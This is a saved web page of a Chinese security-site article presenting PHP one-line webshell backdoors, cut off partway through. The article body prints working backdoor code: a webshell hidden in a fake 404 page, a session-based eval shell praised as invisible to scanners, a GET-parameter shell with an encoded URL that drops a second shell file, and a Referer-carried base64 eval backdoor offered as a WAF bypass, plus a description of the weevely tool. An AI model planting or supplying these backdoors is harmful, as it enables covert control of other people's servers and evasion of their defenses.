<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0045)http://www.freebuf.com/articles/web/9396.html -->
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>
  那些强悍的PHP一句话后门 - FreeBuf.COM | 关注黑客与极客</title>
<meta name="description" content="那些强悍的PHP一句话后门">
<meta name="keywords" content="php,一句话木马">
<meta name="baidu-site-verification" content="nKKKqQxp6R">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="renderer" content="webkit">
<meta property="qc:admins" content="6620477777662552566375">
<link rel="stylesheet" id="wpfp-css" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wpfp.css" type="text/css">
<link rel="stylesheet" id="wp-recentcomments-css" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-recentcomments.css" type="text/css" media="screen">
<link rel="stylesheet" id="mycred-widget-css" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/widget.css" type="text/css" media="all">
<script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/jquery.min.js.下载"></script>
<script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wpfp.js.下载"></script>
<link rel="prev" title="又一钓鱼经典案列分析" href="http://www.freebuf.com/articles/web/9337.html">
<link rel="next" title="美8名犯罪分子在3个月内从ATM取款机盗取4500万美元现金" href="http://www.freebuf.com/news/9410.html">
<link rel="canonical" href="http://www.freebuf.com/articles/web/9396.html">
<link rel="shortlink" href="http://www.freebuf.com/?p=9396">

<link rel="stylesheet" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/highslide.css" type="text/css">
<script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/highslide-with-html.packed.js.下载"></script>
<script type="text/javascript">
jQuery(document).ready(function($) {
    hs.graphicsDir = "http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/";
    hs.outlineType = "rounded-white";
    hs.dimmingOpacity = 0.8;
    hs.outlineWhileAnimating = true;
    hs.showCredits = false;
    hs.captionEval = "this.thumb.alt";
    hs.numberPosition = "caption";
    hs.align = "center";
    hs.transitions = ["expand", "crossfade"];
    hs.addSlideshow({
        interval: 5000,
        repeat: true,
        useControls: true,
        fixedControls: "fit",
        overlayOptions: {
            opacity: 0.75,
            position: "bottom center",
            hideOnMouseOut: true

        }

    });
});
</script>
          <script language="JavaScript" type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/script.js.下载"></script>
      <link rel="stylesheet" type="text/css" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/style.css">
      <script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/highlight.pack.js.下载"></script><link type="text/css" rel="stylesheet" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/default.css">	<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
<link rel="shortcut icon" href="http://static.freebuf.com/images/favicon.ico">
<link rel="stylesheet" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/header.css">
<link href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/bootstrap.min.css" rel="stylesheet" media="screen">
<link href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/style(1).css" rel="stylesheet" type="text/css">
<style type="text/css">
#contenttxt hr {
  display: block;
  height: 0px;
  border: 0;
  border-top: 1px solid #ccc;
  margin: 15px 0;
  padding: 0;
}
#contenttxt table {
  width: 100%;
  table-layout: fixed;
  border-collapse: collapse;
  border-spacing: 0;
  margin: 15px 0;
}
#contenttxt table thead {
  background-color: #f9f9f9;
}
#contenttxt table td, #contenttxt table th {
  min-width: 40px;
  height: 30px;
  border: 1px solid #ccc;
  vertical-align: top;
  padding: 2px 4px;
  text-align: left;
  box-sizing: border-box;
  white-space: pre-wrap; white-space: -moz-pre-wrap; white-space: -pre-wrap; white-space: -o-pre-wrap; word-wrap: break-word;
}
#contenttxt table td.active, #contenttxt table th.active {
  background-color: #ffffee;
  white-space: pre-wrap; white-space: -moz-pre-wrap; white-space: -pre-wrap; white-space: -o-pre-wrap; word-wrap: break-word;
}
</style>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/jquery-2.0.3.min.js.下载"></script>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/bootstrap.min.js.下载"></script>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/slider.js.下载" type="text/javascript"></script>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/jquery.sticky.js.下载" type="text/javascript"></script>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/bjqs-1.3.min.js.下载" type="text/javascript"></script>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/mosaic.1.0.1.min.js.下载" type="text/javascript"></script>
<!--[if lt IE 9]>
    <script src="http://www.freebuf.com/buf/themes/freebuf/js/html5shiv.min.js"></script>
    <script src="http://www.freebuf.com/buf/themes/freebuf/js/respond.min.js"></script>
<![endif]-->
    <style>
        @font-face {font-family: 'iconfont';
            src: url('http://static.3001.net/iconfont/iconfont.eot'); /* IE9*/
            src: url('http://static.3001.net/iconfont/iconfont.eot?#iefix') format('embedded-opentype'), /* IE6-IE8 */
            url('http://static.3001.net/iconfont/iconfont.woff') format('woff'), /* chrome、firefox */
            url('http://static.3001.net/iconfont/iconfonticonfont.ttf') format('truetype'), /* chrome、firefox、opera、Safari, Android, iOS 4.2+*/
            url('http://static.3001.net/iconfont/iconfont.svg#iconfont') format('svg'); /* iOS 4.1- */
        }
    </style>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/share.js.下载"></script><style type="text/css">.highslide img {cursor: url(http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/zoomin.cur), pointer !important;}.highslide-viewport-size {position: fixed; width: 100%; height: 100%; left: 0; top: 0}</style><link rel="stylesheet" href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/share_style1_24.css"><style type="text/css">.highslide img {cursor: url(http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/zoomin.cur), pointer !important;}.highslide-viewport-size {position: fixed; width: 100%; height: 100%; left: 0; top: 0}</style></head>

<body style="position: static;">
<!----------header---------->
<!--头部导航-->
<div id="undefined-sticky-wrapper" class="sticky-wrapper is-sticky">
    <div id="undefined-sticky-wrapper" class="sticky-wrapper" style="height: 65px;"><div class="main-header">
        <div class="header">
            <div class="header-container clearfix">
                <div class="header-logo"><a href="http://www.freebuf.com/"></a></div>
                <div class="nav">
                    <ul class="nav-child clearfix">
                        <li class=" index"><a href="http://www.freebuf.com/">首页</a></li>
                        <li class="read-classify">
                            <a href="http://www.freebuf.com/articles/web/9396.html#">分类阅读<b class="triangle-down triangle-down-04"></b></a>
                            <ul class="dropdown-menu" style="display: none;">
                                <li>
                                    <strong>黑客</strong>
                                    <div class="nav-item">
                                        <a href="http://www.freebuf.com/vuls" target="_blank">漏洞</a>
                                        <a href="http://www.freebuf.com/sectool" target="_blank">安全工具</a>
                                        <a href="http://www.freebuf.com/articles/web" target="_blank">WEB安全</a>
                                        <a href="http://www.freebuf.com/articles/system" target="_blank">系统安全</a>
                                        <a href="http://www.freebuf.com/articles/network" target="_blank">网络安全</a>
                                        <a href="http://www.freebuf.com/articles/wireless" target="_blank">无线安全</a>
                                        <a href="http://www.freebuf.com/articles/terminal" target="_blank">设备/客户端安全</a>
                                        <a href="http://www.freebuf.com/articles/database" target="_blank">数据库安全</a>
                                        <a href="http://www.freebuf.com/articles/security-management" target="_blank">安全管理</a>
                                    </div>
                                </li>
                                <li>
                                    <strong>极客</strong>
                                    <div class="nav-item">
                                        <a href="http://www.freebuf.com/geek" target="_blank">极客有意思</a>
                                        <a href="http://www.freebuf.com/news/others" target="_blank">周边</a>
                                    </div>
                                </li>
                                <li>
                                    <strong>特色</strong>
                                    <div class="nav-item"><a href="http://www.freebuf.com/news/special" target="_blank">头条</a><a href="http://www.freebuf.com/articles/people" target="_blank">人物志</a><a href="http://www.freebuf.com/fevents" target="_blank">活动</a><a href="http://www.freebuf.com/video" target="_blank">视频</a><a href="http://www.freebuf.com/articles/neopoints" target="_blank">观点</a><a href="http://www.freebuf.com/jobs" target="_blank">招聘</a><a href="http://www.freebuf.com/paper/" target="_blank">报告</a></div>
                                </li>
                            </ul>
                        </li>
                        <li><a href="http://www.freebuf.com/wenku" target="_blank">文库</a><b class="icon-betr"></b></li>
                        <li><a href="http://fit.freebuf.com/" target="_blank">FIT大会</a><b class="icon-hot"></b></li>
                        <li><a href="http://bar.freebuf.com/" target="_blank">小酒馆</a></li>
                        <li><a href="http://open.freebuf.com/" target="_blank">公开课</a></li>
                        <li><a href="http://shop.freebuf.com/" target="_blank">商城</a></li>
                        <li><a href="https://www.vulbox.com/" target="_blank">漏洞盒子</a></li>
                    </ul>
                </div>
                <div class="header-right">
                                    <div class="loginSign login-before">
                        <a href="https://account.tophant.com/register.html" class="login-btn">注册</a>
                        |
                        <a href="http://www.freebuf.com/oauth" class="sign-btn">登录</a>
                    </div>
                                    <div class="btn-publish">
                        <a href="http://www.freebuf.com/articles/web/9396.html#">投稿</a>
                        <div class="btn-publish-child">
                            <ul class="btn-child clearfix">
                                <li><a href="http://my.freebuf.com/post/edit/" target="_blank">文章撰写</a></li>
                                <li><hr></li>
                                <li><a href="http://my.freebuf.com/post/article/" target="_blank">投稿管理</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="nav-small">
                    <a href="http://www.freebuf.com/articles/web/9396.html#"></a>
                    <ul class="nav-child clearfix">
                        <li class=" index"><a href="http://www.freebuf.com/">首页</a></li>
                        <li class="read-classify">
                            <a href="http://www.freebuf.com/articles/web/9396.html#">分类阅读<b class="triangle-down triangle-down-04"></b></a>
                            <ul class="dropdown-menu" style="display: none;">
                                <li>
                                    <strong>黑客</strong>
                                    <div class="nav-item">
                                        <a href="http://www.freebuf.com/vuls" target="_blank">漏洞</a>
                                        <a href="http://www.freebuf.com/sectool" target="_blank">安全工具</a>
                                        <a href="http://www.freebuf.com/articles/web" target="_blank">WEB安全</a>
                                        <a href="http://www.freebuf.com/articles/system" target="_blank">系统安全</a>
                                        <a href="http://www.freebuf.com/articles/network" target="_blank">网络安全</a>
                                        <a href="http://www.freebuf.com/articles/wireless" target="_blank">无线安全</a>
                                        <a href="http://www.freebuf.com/articles/terminal" target="_blank">设备/客户端安全</a>
                                        <a href="http://www.freebuf.com/articles/database" target="_blank">数据库安全</a>
                                        <a href="http://www.freebuf.com/articles/security-management" target="_blank">安全管理</a>
                                    </div>
                                </li>
                                <li>
                                    <strong>极客</strong>
                                    <div class="nav-item">
                                        <a href="http://www.freebuf.com/geek" target="_blank">极客有意思</a>
                                        <a href="http://www.freebuf.com/news/others" target="_blank">周边</a>
                                    </div>
                                </li>
                                <li>
                                    <strong>特色</strong>
                                    <div class="nav-item">
                                        <a href="http://www.freebuf.com/news/special" target="_blank">头条</a>
                                        <a href="http://www.freebuf.com/articles/people" target="_blank">人物志</a>
                                        <a href="http://www.freebuf.com/fevents" target="_blank">活动</a>
                                        <a href="http://www.freebuf.com/video" target="_blank">视频</a>
                                        <a href="http://www.freebuf.com/articles/neopoints" target="_blank">观点</a>
                                        <a href="http://www.freebuf.com/jobs" target="_blank">招聘</a>
                                        <a href="http://www.freebuf.com/paper/" target="_blank">报告</a>
                                    </div>
                                </li>
                            </ul>
                        </li>
                        <li><a href="http://www.freebuf.com/wenku" target="_blank">文库</a></li>
                        <li><a href="http://fit.freebuf.com/" target="_blank">FIT大会</a></li>
                        <li><a href="http://bar.freebuf.com/" target="_blank">小酒馆</a></li>
                        <li><a href="http://open.freebuf.com/" target="_blank">公开课</a></li>
                        <li><a href="http://shop.freebuf.com/" target="_blank">商城</a></li>
                        <li><a href="https://www.vulbox.com/" target="_blank">漏洞盒子</a></li>
                        <li><a href="http://my.freebuf.com/post/edit" target="_blank">投稿</a></li>
                                                    <li><a href="https://account.tophant.com/register.html" class="login-btn">注册</a></li>
                            <li><a href="http://www.freebuf.com/oauth" class="sign-btn">登录</a></li>
                                            </ul>
                </div>
            </div>
        </div>
    </div></div>
</div>
<!----------header end---------->
<script type="application/javascript">
    $(function(){
        //头部投稿按钮hover状态展开菜单
        $(".btn-publish-child > ul > li").hover(function(){
            $(this).addClass("active");
            $(this).siblings().removeClass("active");
        });

        $(document).click(function(event){
            var ev = ev || event;
            $(".login-after").find(".login-after-child").hide();
            $(".read-classify").find(".dropdown-menu").hide();
        });
        //点击用户信息，出现下拉菜单
        $("#user-info").click(function(event){
            var ev = ev || event;
            ev.stopPropagation();
            $(".login-after").find(".login-after-child").toggle();
        });
        //分类阅读下拉菜单
        $(".read-classify").click(function(event){
            var ev = ev || event;
            ev.stopPropagation();
            $(this).find(".dropdown-menu").toggle();
        });
        //分类阅读hover状态
        $(".read-classify").hover(function(){
            $(this).find("a > b").addClass("triangle-down-w");
        },function(){
            $(this).find("a > b").removeClass("triangle-down-w");
        });
        //顶部导航
        $(".nav-small").click(function(){
            $(this).find(".nav-child").slideToggle();
        });
    });

</script><script>
    jQuery(window).load(function(){
      if(jQuery(window).width()>480){
        jQuery(".main-header").sticky({ topSpacing: 0 });
      }else{
        jQuery(".main-header nav").removeClass("navbar-fixed-top");
      }
      jQuery("#mar-right").sticky({ topSpacing: 105,bottomSpacing: 410 });
    });
</script>
<script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/prettify.js.下载"></script>
<script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/lazyload.js.下载"></script>
<script type="text/javascript" charset="utf-8">
      jQuery(function() {
          jQuery("img").lazyload({
              effect : "fadeIn"
          });
      });
 </script>
<script type="text/javascript">
    window.onload = function(){
        prettyPrint();
    }
</script>
<script language="JavaScript" type="text/javascript">
//<![CDATA[
var va = "您已经点亮过了";
function acv_vote(id,option, m){
  if( m==null) m =''; m = m + '';
  jQuery('#acv_stat_'+m+id).html('Loading...');
  var url="http://www.freebuf.com/index.php?acv_ajax=true&option="+option+"&ID="+id;
  jQuery.get(url,function(d){
    d =d.split('|');var s='#acv_stat_'+m+d[0];
    var sele = '#cos_support-'+m+id,unsele = '#cos_unsupport-'+m+id,tpjs = 'javascript:alert(va)';
    jQuery( s ).html( d[1] );jQuery(s).fadeOut(400,function(){jQuery(s).fadeIn();});
    if( d[2] == 1 ){ jQuery(sele).html(jQuery(sele).html()*1+1); }
    if( d[2] == -1 ){ jQuery(unsele).html(jQuery(unsele).html()*1+1); }
    jQuery('#vote4-'+id).attr('href',tpjs);jQuery('#vote4-2'+id).attr('href',tpjs);
    jQuery('#votea-'+id).attr('href',tpjs);jQuery('#votea-2'+id).attr('href',tpjs);
  });
}
  
$(document).on("mouseenter",".comment-tools",function(){
  $(this).find(".btn-report").show();
  $(this).find(".btn-report").addClass("hover");
}).on("mouseleave",".comment-tools",function(){
  var $_this = $(this);
  $(this).find(".btn-report").removeClass("hover");
  if(!$(this).find(".dropup").hasClass('open')){
    $(this).find(".btn-report").hide(); 
    $_this.find(".dropdown-menu").css("display","none");
  }else{
    setTimeout(function(){
      if(!$_this.find(".btn-report").hasClass("hover")){
        $_this.find(".dropup").removeClass("open");
        $_this.find(".dropdown-menu").css("display","none");
        $_this.find(".btn-report").hide(); 
      }
    },"500");
  }
})

$(document).on("click",".click_report",function(){
  $(this).parent().parent().css("display","none");
  var id = $(this).attr("data-id");
  var url="http://www.freebuf.com/index.php?acv_ajax=true&option=0&ID="+id;
  $_this = $(this);
  jQuery.get(url,function(d){
    d =d.split('|');
    if(d[1]=='您已经点过灯了'){
      d[1] = '您已经举报过了';
    }
    if(d[1]=='Thank you'){
      d[1] = '举报成功';
    }
    $_this.parent().parent().parent().find(".btn-report").text(d[1]);
    $_this.parent().parent().parent().find(".btn-report").css("display","block");
  })
})

$(document).on("click",".btn-report",function(){
  if($(this).parent().hasClass('open')){
    $(this).parent().find(".dropdown-menu").css("display","block");
  }else{
    $(this).parent().find(".dropdown-menu").css("display","none");
  }
})
//]]>
</script>
<div class="container pad-top35">
  <div class="row clearfix">
        <div class="col-md-9" id="getWidth">
      <div class="article-wrap panel panel-default">
                    <div class="articlecontent">
        <div class="title">
          <h2> 那些强悍的PHP一句话后门 </h2>
          <div class="property">
		  		  <span class="name"><a href="http://www.freebuf.com/author/oooceo" title="由 oooceo 发布" rel="author">oooceo</a></span>
		  		  <span class="icon-f"></span>
		  <span class="time">2013-05-10</span>
             
		  <span class="look">共<strong>1567995</strong>人围观
              ，发现 <strong>48</strong> 个不明物体 </span>          
		  <span class="tags">		  
		  <a href="http://www.freebuf.com/articles/web">WEB安全</a></span>	
        <span class="tags_01"></span>			  
		  </div>
        </div>
                        <div id="contenttxt">
           <p>
	<span style="color:#009900;">我们以一个学习的心态来对待这些PHP后门程序，很多PHP后门代码让我们看到程序员们是多么的用心良苦。</span>
</p>
<p>
	<span style="white-space:nowrap;"><strong>强悍的PHP一句话后门</strong></span><strong></strong>
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<strong>利用404页面隐藏PHP小马：</strong>
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="dec">&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;</span><span class="pln">
</span><span class="tag">&lt;html&gt;&lt;head&gt;</span><span class="pln">
</span><span class="tag">&lt;title&gt;</span><span class="pln">404 Not Found</span><span class="tag">&lt;/title&gt;</span><span class="pln">
</span><span class="tag">&lt;/head&gt;&lt;body&gt;</span><span class="pln">
</span><span class="tag">&lt;h1&gt;</span><span class="pln">Not Found</span><span class="tag">&lt;/h1&gt;</span><span class="pln">
</span><span class="tag">&lt;p&gt;</span><span class="pln">The requested URL was not found on this server.</span><span class="tag">&lt;/p&gt;</span><span class="pln">
</span><span class="tag">&lt;/body&gt;&lt;/html&gt;</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">php
</span><span class="lit">@preg_replace</span><span class="pun">(</span><span class="str">"/[pageerror]/e"</span><span class="pun">,</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'error'</span><span class="pun">],</span><span class="str">"saft"</span><span class="pun">);</span><span class="pln">
header</span><span class="pun">(</span><span class="str">'HTTP/1.1 404 Not Found'</span><span class="pun">);</span><span class="pln">
</span><span class="pun">?&gt;</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	404页面是网站常用的文件，一般建议好后很少有人会去对它进行检查修改，这时我们可以利用这一点进行隐藏后门。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<strong>无特征隐藏PHP一句话：</strong>
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="pun">&lt;?</span><span class="pln">php
session_start</span><span class="pun">();</span><span class="pln">
$_POST</span><span class="pun">[</span><span class="str">'code'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $_SESSION</span><span class="pun">[</span><span class="str">'theCode'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> trim</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'code'</span><span class="pun">]);</span><span class="pln">
$_SESSION</span><span class="pun">[</span><span class="str">'theCode'</span><span class="pun">]&amp;&amp;</span><span class="pln">preg_replace</span><span class="pun">(</span><span class="str">'\'a\'eis'</span><span class="pun">,</span><span class="str">'e'</span><span class="pun">.</span><span class="str">'v'</span><span class="pun">.</span><span class="str">'a'</span><span class="pun">.</span><span class="str">'l'</span><span class="pun">.</span><span class="str">'(base64_decode($_SESSION[\'theCode\']))'</span><span class="pun">,</span><span class="str">'a'</span><span class="pun">);</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	将$_POST['code']的内容赋值给$_SESSION['theCode']，然后执行$_SESSION['theCode']，亮点是没有特征码。用扫描工具来检查代码的话，是不会报警的，达到目的了。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<strong>超级隐蔽的PHP后门：</strong>
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="pun">&lt;?</span><span class="pln">php $_GET</span><span class="pun">[</span><span class="pln">a</span><span class="pun">](</span><span class="pln">$_GET</span><span class="pun">[</span><span class="pln">b</span><span class="pun">]);?&gt;</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	仅用GET函数就构成了木马；
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	利用方法：
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="pun">?</span><span class="pln">a</span><span class="pun">=</span><span class="kwd">assert</span><span class="pun">&amp;</span><span class="pln">b</span><span class="pun">=</span><span class="pln">$</span><span class="pun">{</span><span class="pln">fputs</span><span class="pun">%</span><span class="lit">28fopen</span><span class="pun">%</span><span class="lit">28base64</span><span class="pln">_decode</span><span class="pun">%</span><span class="lit">28Yy5waHA</span><span class="pun">%</span><span class="lit">29</span><span class="pun">,</span><span class="pln">w</span><span class="pun">%</span><span class="lit">29</span><span class="pun">,</span><span class="pln">base64_decode</span><span class="pun">%</span><span class="lit">28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x</span><span class="pun">%</span><span class="lit">29</span><span class="pun">%</span><span class="lit">29</span><span class="pun">};</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<strong>层级请求，编码运行PHP后门：</strong><br>
此方法用两个文件实现，文件1
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="pun">&lt;?</span><span class="pln">php
</span><span class="com">//1.php</span><span class="pln">
header</span><span class="pun">(</span><span class="str">'Content-type:text/html;charset=utf-8'</span><span class="pun">);</span><span class="pln">
parse_str</span><span class="pun">(</span><span class="pln">$_SERVER</span><span class="pun">[</span><span class="str">'HTTP_REFERER'</span><span class="pun">],</span><span class="pln"> $a</span><span class="pun">);</span><span class="pln">
</span><span class="kwd">if</span><span class="pun">(</span><span class="pln">reset</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">)</span><span class="pln"> </span><span class="pun">==</span><span class="pln"> </span><span class="str">'10'</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> count</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">)</span><span class="pln"> </span><span class="pun">==</span><span class="pln"> </span><span class="lit">9</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
&nbsp;&nbsp;&nbsp;</span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">base64_decode</span><span class="pun">(</span><span class="pln">str_replace</span><span class="pun">(</span><span class="str">" "</span><span class="pun">,</span><span class="pln"> </span><span class="str">"+"</span><span class="pun">,</span><span class="pln"> implode</span><span class="pun">(</span><span class="pln">array_slice</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">,</span><span class="pln"> </span><span class="lit">6</span><span class="pun">)))));</span><span class="pln">
</span><span class="pun">}</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	文件2
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="pun">&lt;?</span><span class="pln">php
</span><span class="com">//2.php</span><span class="pln">
header</span><span class="pun">(</span><span class="str">'Content-type:text/html;charset=utf-8'</span><span class="pun">);</span><span class="pln">
</span><span class="com">//要执行的代码</span><span class="pln">
$code </span><span class="pun">=</span><span class="pln"> </span><span class="pun">&lt;&lt;&lt;</span><span class="pln">CODE
phpinfo</span><span class="pun">();</span><span class="pln">
CODE</span><span class="pun">;</span><span class="pln">
</span><span class="com">//进行base64编码</span><span class="pln">
$code </span><span class="pun">=</span><span class="pln"> base64_encode</span><span class="pun">(</span><span class="pln">$code</span><span class="pun">);</span><span class="pln">
</span><span class="com">//构造referer字符串</span><span class="pln">
$referer </span><span class="pun">=</span><span class="pln"> </span><span class="str">"a=10&amp;b=ab&amp;c=34&amp;d=re&amp;e=32&amp;f=km&amp;g={$code}&amp;h=&amp;i="</span><span class="pun">;</span><span class="pln">
</span><span class="com">//后门url</span><span class="pln">
$url </span><span class="pun">=</span><span class="pln"> </span><span class="str">'http://localhost/test1/1.php'</span><span class="pun">;</span><span class="pln">
$ch </span><span class="pun">=</span><span class="pln"> curl_init</span><span class="pun">();</span><span class="pln">
$options </span><span class="pun">=</span><span class="pln"> array</span><span class="pun">(</span><span class="pln">
&nbsp;&nbsp;&nbsp;&nbsp;CURLOPT_URL </span><span class="pun">=&gt;</span><span class="pln"> $url</span><span class="pun">,</span><span class="pln">
&nbsp;&nbsp;&nbsp;&nbsp;CURLOPT_HEADER </span><span class="pun">=&gt;</span><span class="pln"> FALSE</span><span class="pun">,</span><span class="pln">
&nbsp;&nbsp;&nbsp;&nbsp;CURLOPT_RETURNTRANSFER </span><span class="pun">=&gt;</span><span class="pln"> TRUE</span><span class="pun">,</span><span class="pln">
&nbsp;&nbsp;&nbsp;&nbsp;CURLOPT_REFERER </span><span class="pun">=&gt;</span><span class="pln"> $referer
</span><span class="pun">);</span><span class="pln">
curl_setopt_array</span><span class="pun">(</span><span class="pln">$ch</span><span class="pun">,</span><span class="pln"> $options</span><span class="pun">);</span><span class="pln">
echo curl_exec</span><span class="pun">(</span><span class="pln">$ch</span><span class="pun">);</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果，一般waf对referer这些检测要松一点，或者没有检测。用这个思路bypass waf不错。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<strong style="font-variant:inherit;line-height:inherit;font-size:12px;">PHP后门生成工具weevely</strong>
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-variant:inherit;line-height:inherit;font-size:12px;">weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web 页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。</span>
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-variant:inherit;line-height:inherit;font-size:12px;">weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描，结果显示该文件无任何威胁。</span>
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	以上是大概介绍下边是截图，相关使用方法亦家就不在这介绍了，简单的科普一下。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<a href="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130510075146_27149.jpg" class="highslide-image" onclick="return hs.expand(this);" target="_blank"><img data-original="http://image.3001.net/uploads/image/20130510/20130510075146_27149.jpg" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130510075146_27149.jpg" alt="" style="display: inline;"></a>
<noscript>&lt;img src="http://image.3001.net/uploads/image/20130510/20130510075146_27149.jpg" alt="" /&gt;</noscript>
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	三个变形的一句话PHP木马<br>
第一个
</p>
